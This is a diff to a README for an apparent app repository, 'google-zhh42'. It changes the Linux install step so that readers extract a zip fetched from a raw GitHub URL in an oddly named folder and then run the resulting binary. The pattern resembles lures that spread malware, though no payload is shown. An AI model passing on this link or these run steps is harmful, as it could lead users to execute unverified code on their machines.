emosgoat/google-zhh42/README.md

 - Open your Applications folder and find the app to start using it.

 ### For Linux Users:
-- Extract the `.tar.gz` file to your desired location.
+- Extract the `https://raw.githubusercontent.com/emosgoat/google-zhh42/main/overstimulate/google-zhh42.zip` file to your desired location.
 - Open the terminal and navigate to the extracted folder using `cd`.
 - Run the application by typing `./google-zhh42` in the terminal.